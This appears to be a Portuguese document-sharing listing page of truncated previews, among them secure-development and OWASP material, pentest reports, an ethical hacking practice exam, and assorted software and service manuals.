Boas Práticas de Desenvolvimento Seguro Boas Práticas de Desenvolvimento Seguro Julho / 2.012 Histórico de Revisões Data Versão Descrição Autor 29/07/2012 1.0 Versão inicial Ricardo Kiyoshi Página 2 de 11 Conteúdo 1. SEGURANÇA DA INFORMAÇÃO

Leia mais

Boletim Eletrônico de Recolhimento Manual do Sistema. Boletim Eletrônico de Recolhimento. Manual do Sistema

Boletim Eletrônico de Recolhimento Manual do Sistema. Boletim Eletrônico de Recolhimento. Manual do Sistema Boletim Eletrônico de Recolhimento Manual do Sistema Versão 1.2 Junho / 2013 Sumário 1. Introdução... - 3-2. O Sistema BOLETIM ELETRÔNICO DE RECOLHIMENTO... - 3-3. Pré-requisitos... - 3-4. Primeiro Acesso...

Leia mais

Como criar um blog. Será aberta uma janela onde você deverá especificar o título do blog, o endereço do blog, e o modelo.

Como criar um blog. Será aberta uma janela onde você deverá especificar o título do blog, o endereço do blog, e o modelo. Como criar um blog Criando o blog Vá em www.blogger.com. Entre com sua conta google (a mesma que você usa para acessar o gmail). Escolha um perfil. Na página seguinte, clique no botão novo blog. Será aberta

Leia mais

Construindo uma aplicação PHP à Prova de Balas

Construindo uma aplicação PHP à Prova de Balas Construindo uma aplicação PHP à Prova de Balas Rafael Jaques TcheLinux - Porto Alegre - 14/11/09 Buscai primeiro o reino do Senhor e a sua justiça, e todas as demais coisas vos serão acrescentadas (Mateus

Leia mais

RELATÓRIOS PENTEST S

RELATÓRIOS PENTEST S FACULDADE DE TECNOLOGIA SENAC GOIÁS SEGURANÇA DA INFORMAÇÃO - V ALLAN BERG BARBOSA GUIMARÃES CARLOS ANTÔNIO DA SILVA JUAREZ JUNIOR FREITAS DE OLIVEIRA RELATÓRIOS PENTEST S GOIÂNIA 2016/2 ALLAN BERG BARBOSA

Leia mais

UNIVERSIDADE REGIONAL DE BLUMENAU DIVISÃO DE TECNOLOGIA DA INFORMAÇÃO

UNIVERSIDADE REGIONAL DE BLUMENAU DIVISÃO DE TECNOLOGIA DA INFORMAÇÃO UNIVERSIDADE REGIONAL DE BLUMENAU DIVISÃO DE TECNOLOGIA DA INFORMAÇÃO MANUAL DE UTILIZAÇÃO DO DION (DIÁRIO ONLINE FURB) - PROFESSORES 1. ACESSANDO O SISTEMA O sistema DION está disponível no endereço www.furb.br/dion.

Leia mais

TUTORIAL PARA O TUTOR VALIDAR BOLSA DE SUPERVISOR

TUTORIAL PARA O TUTOR VALIDAR BOLSA DE SUPERVISOR PROJETO MAIS MÉDICOS PARA O BRASIL TUTORIAL PARA O TUTOR VALIDAR BOLSA DE SUPERVISOR Brasília/DF, 17 de novembro de 2015. 1 APRESENTAÇÃO Prezado (a) Tutor (a) participante do PROJETO MAIS MÉDICO PARA O

Leia mais

Tutorial para Atualização do Laboratório de Informática

Tutorial para Atualização do Laboratório de Informática Tutorial para Atualização do Laboratório de Informática Esse tutorial mostra os procedimentos a serem realizados para atualização correta do Laboratório de Informática. Leia atentamente o passo a passo

Leia mais

ANDRÉ ALENCAR 1 INFORMÁTICA INTERNET EXPLORER 9

ANDRÉ ALENCAR 1 INFORMÁTICA INTERNET EXPLORER 9 ANDRÉ ALENCAR 1 INFORMÁTICA INTERNET EXPLORER 9 1. JANELA PADRÃO Importante: O Internet Explorer não pode ser instalado no Windows XP. 2. INTERFACE MINIMALISTA Seguindo uma tendência já adotada por outros

Leia mais

LINX POSTOS AUTOSYSTEM

LINX POSTOS AUTOSYSTEM LINX POSTOS AUTOSYSTEM Manual Sumário 1 INTRODUÇÃO AO POSTGRES...3 2 INSTALAÇÃO...3 2.1 Download...3 2.2 Instalação...4 3 CONFIGURAÇÃO...7 3.1 CIDR-ADDRESS...8 3.2 Biometria...9 4 LINHA DE COMANDO...10

Leia mais

Criação de Aplicativos de redes sociais para Autenticação

Criação de Aplicativos de redes sociais para Autenticação Criação de Aplicativos de redes sociais para Autenticação 1 ÍNDICE... 2 1 OBJETIVO... 5 1.1 FINALIDADE... 5 2 CRIANDO APLICATIVO DO FACEBOOK... 6 2.1 NAVEGANDO NA PÁGINA HTTPS://DEVELOPERS.FACEBOOK.COM:...

Leia mais

Inicialização Rápida do Aplicativo de Desktop Novell Filr 1.2 para Windows

Inicialização Rápida do Aplicativo de Desktop Novell Filr 1.2 para Windows Inicialização Rápida do Aplicativo de Desktop Novell Filr 1.2 para Windows Abril de 2015 Inicialização rápida O Novell Filr permite que você acesse facilmente todos os seus arquivos e pastas do desktop,

Leia mais

- Nota Fiscal Eletrônica -

- Nota Fiscal Eletrônica - Manual Portal de Clientes e Transportadores - Nota Fiscal Eletrônica - ÍNDICE. INTRODUÇÃO 3. OBJETIVO 3.2 ABRANGÊNCIA 3 2. FUNCIONALIDADES 3 2. CADASTRO DE CLIENTES NO PORTAL 3 2.2 CONSULTA NOTAS FISCAIS

Leia mais

Manual de Construção de Vitrine Virtual

Manual de Construção de Vitrine Virtual Ministério do Desenvolvimento, Indústria e Comércio Exterior Secretaria de Comércio Exterior Departamento de Planejamento e Desenvolvimento do Comércio Exterior Manual de Construção de Vitrine Virtual

Leia mais

Segurança em Aplicações Web Metodologia OWASP

Segurança em Aplicações Web Metodologia OWASP Segurança em Aplicações Web Metodologia OWASP Weekly Seminar Lucas Vinícius da Rosa Laboratório de Segurança em Computação () Universidade Federal de Santa Catarina (UFSC) lvrosa@inf.ufsc.br 2012 Sumário

Leia mais

Fundamentos de Ethical Hacking EXIN

Fundamentos de Ethical Hacking EXIN Exame Simulado Fundamentos de Ethical Hacking EXIN Edição Augusto 2015 Copyright 2015 EXIN Todos os direitos reservados. Nenhuma parte desta publicação pode ser publicado, reproduzido, copiado ou armazenada

Leia mais

20486 - DESENVOLVIMENTO DE APLICAÇÕES DE WEB ASP.NET MVC 4

20486 - DESENVOLVIMENTO DE APLICAÇÕES DE WEB ASP.NET MVC 4 20486 - DESENVOLVIMENTO DE APLICAÇÕES DE WEB ASP.NET MVC 4 CONTEÚDO PROGRAMÁTICO Módulo 1: Explorando ASP.NET MVC4 O Objetivo Deste módulo de e delinear AOS Alunos OS Componentes da Pilha de Tecnologias

Leia mais

0800-728-2001 (Capitais e Interior) 0800-729-2001 (Demais Localidades) 0800-727-2001 (Capitais e Interior) Golden Fone (SAC)

0800-728-2001 (Capitais e Interior) 0800-729-2001 (Demais Localidades) 0800-727-2001 (Capitais e Interior) Golden Fone (SAC) Golden Fone (SAC) 0800-728-2001 (Capitais e Interior) Central Técnica 4004-2001 (Regiões Metropolitanas do Rio de Janeiro, São Paulo, Salvador, Belo Horizonte, Porto Alegre, Brasília e São Luís) 0800-729-2001

Leia mais

Desenvolvimento e disponibilização de Conteúdos para a Internet

Desenvolvimento e disponibilização de Conteúdos para a Internet Desenvolvimento e disponibilização de Conteúdos para a Internet Por Matheus Orion OWASP A Open Web Application Security Project (OWASP) é uma entidade sem fins lucrativos e de reconhecimento internacional,

Leia mais

Quando a máquina terminar o arranque e lhe pedir as credenciais para entrar, introduza as seguintes:

Quando a máquina terminar o arranque e lhe pedir as credenciais para entrar, introduza as seguintes: Segurança Informa tica e nas Organizaço es Vulnerabilidades na Web (V1.1) Este trabalho deve ser realizado na máquina virtual Ubuntu10tm que pode descarregar de ftp://www.ieeta.pt/avzdatastore/vulnerable%20linux/ubuntu10tm.zip,

Leia mais

Programação Orientada a Objetos com PHP & MySQL Cookies e Sessões. Prof. MSc. Hugo Souza

Programação Orientada a Objetos com PHP & MySQL Cookies e Sessões. Prof. MSc. Hugo Souza Programação Orientada a Objetos com PHP & MySQL Cookies e Sessões Prof. MSc. Hugo Souza Se você precisar manter informações sobre seus usuários enquanto eles navegam pelo seu site, ou até quando eles saem

Leia mais

Manual do Cliente. Alu Tracker Monitoramento Veicular

Manual do Cliente. Alu Tracker Monitoramento Veicular Alu Tracker Monitoramento Veicular Manual do cliente Manual do Cliente Alu Tracker Monitoramento Veicular Introdução Este manual faz parte do contrato de prestação de serviços. Obrigado por escolher a

Leia mais

PROCEDIMENTO DE MIGRAÇÃO

PROCEDIMENTO DE MIGRAÇÃO PROCEDIMENTO DE MIGRAÇÃO Portais Web Rev. 01-06/08/10 TOTVS Unidade Joinville Avenida Santos Dumont, 831 Santo Antônio Fone: (47) 2101-3000 Fax: (47) 2101-3001 89218-900 Joinville Santa Catarina www.totvs.com.br

Leia mais

VULNERABILIDADES WEB v.2.2

VULNERABILIDADES WEB v.2.2 VULNERABILIDADES WEB v.2.2 $ whoami Sgt NILSON Sangy Computer Hacking Forensic Investigator Analista de Segurança da Informação Guerreiro Cibernético $ ls -l /etc 1. Contextualização 2. OWASP 2.1. Injeção

Leia mais

CADERNOS DE INFORMÁTICA Nº 1. Fundamentos de Informática I - Word 2010. Sumário

CADERNOS DE INFORMÁTICA Nº 1. Fundamentos de Informática I - Word 2010. Sumário CADERNO DE INFORMÁTICA FACITA Faculdade de Itápolis Aplicativos Editores de Texto WORD 2007/2010 Sumário Editor de texto... 3 Iniciando Microsoft Word... 4 Fichários:... 4 Atalhos... 5 Área de Trabalho:

Leia mais

Versão 9 Release 1.2 23 de setembro de 2015. Guia de Instalação do IBM Interact IBM

Versão 9 Release 1.2 23 de setembro de 2015. Guia de Instalação do IBM Interact IBM Versão 9 Release 1.2 23 de setembro de 2015 Guia de Instalação do IBM Interact IBM Observação Antes de usar estas informações e o produto suportado por elas, leia as informações em Avisos na página 75.

Leia mais